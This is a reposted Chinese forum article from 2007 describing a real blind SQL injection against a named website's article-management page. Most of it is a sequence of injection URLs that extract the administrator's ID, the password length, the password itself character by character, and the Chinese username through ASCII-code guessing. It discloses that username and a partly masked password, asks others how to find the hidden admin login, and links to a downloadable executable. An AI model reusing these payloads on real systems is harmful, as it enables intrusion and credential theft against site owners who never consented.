浪客联盟的文章管理的密码

发表于:2007-05-25来源:作者:点击数: 标签:管理浪客文章联盟密码
浪客联盟的文章管理的密码用户名:蛊惑男孩 密码:win!#%**** 呵呵,欲望这个你熟吧。 本来是无意的,得到了你的用户名和密码,竟无法进入的你文章管理,不知道你把管理入口搬到哪里去了。 我就说说我是如何得到这个密码和用户名, 他的文章管理是动网的,因

浪客联盟的文章管理的密码 用户名:蛊惑男孩 密码:win!#%****
呵呵,欲望这个你熟吧。
本来是无意的,得到了你的用户名和密码,竟无法进入的你文章管理,不知道你把管理入口搬到哪里去了。
我就说说我是如何得到这个密码和用户名,
他的文章管理是动网的,因为list.asp对id没有过滤,所以可以进行注入攻击,本来LCX有个脚本的,可是我怎么也不会使只好自己手动了,
首先提交如下
http://longker.7x24.cn/article/list.asp?id=253 and 1=1
http://longker.7x24.cn/article/list.asp?id=253 and 1=2
发现如果为真则返回文章,否则返回找不到改文章,
好了,来判断管理员id
http://longker.7x24.cn/article/list.asp?id=253 and 1=(select id from admin where flag=1)
F返回文章》》》管理员ID为1
http://longker.7x24.cn/article/list.asp?id=253 and 1=(select max(id) from admin where flag=1)
返回文章》》》》只有一个管理员
http://longker.7x24.cn/article/list.asp?id=253 and 1=(select id from admin where len(password)>2)
返回文章》》》密码长度大于2
http://longker.7x24.cn/article/list.asp?id=253 and 1=(select id from admin where len(password)>11)
没返回文章》》》密码长度小于11
http://longker.7x24.cn/article/list.asp?id=253 and 1=(select id from admin where len(password)=10)
返回了》》》密码长度为10呵呵,有门了
http://longker.7x24.cn/article/list.asp?id=253 and 1=(select id from admin where asc(mid(password,1,1))>100)
这里解释一下,MID函数可以把密码分成若干部分取出,使用方法 MID(字符串,起始位,取出的字符串的长度),我的这句是说把PASSWORD中的第一位字符取出, ASC可以把字母转换成ASC码
然后我就判断他的ASC码的范围
返回了,好的,继续
http://longker.7x24.cn/article/list.asp?id=253 and 1=(select id from admin where asc(mid(password,1,1))>120)
这次没返回,看来介于100 和120
然后慢慢试,最后提交这个语句
http://longker.7x24.cn/article/list.asp?id=253 and 1=(select id from admin where asc(mid(password,1,1))=119)
返回了,好的,就是119,查一下,是 w
好的开始猜第二位
http://longker.7x24.cn/article/list.asp?id=253 and 1=(select id from admin where asc(mid(password,2,1))>100)
。。。。。。
没什么新意了,最后得到了密码
然后我就想他的用户名,下面有点意思
http://longker.7x24.cn/article/list.asp?id=253 and 1=(select id from admin where asc(mid(username,1,1))>100)
没有返回文章,慢慢我发现提交了很多也没返回,原来他的用户名是中文!
晕,怎么办???似乎不能用ASC来转换中文,
在研究了一点VB后,发现事情有了转机,大家都知道ASC都是正的,
但是汉字也可以ASC转换的,他是负!!而且一般都很大,很多嘛。
哈哈,好的,
提交如下:
http://longker.7x24.cn/article/list.asp?id=253 and 1=(select id from admin where asc(mid(username,1,1))>-18000)
哈哈,终于返回了文章!!
然后慢慢试得到了如下的四个码
-17978 蛊
-17421 惑
-15152 男
-17758 孩
呵呵,只要用CHR一转变就出汉字了。我自己顺手遍了个程序,在论坛的“汉字猜测”文章里。
输入码,出汉字。
好了,这里就得到了,但是我发现他把管理入口不知道弄到哪里去了,晕,一直猜了好久也没
猜到,动用GOOGLE也没查到,有没有高手给个方法??

顺便写了个转换小程序
http://www.roott.com/pig.exe

原文转自:http://www.ltesting.net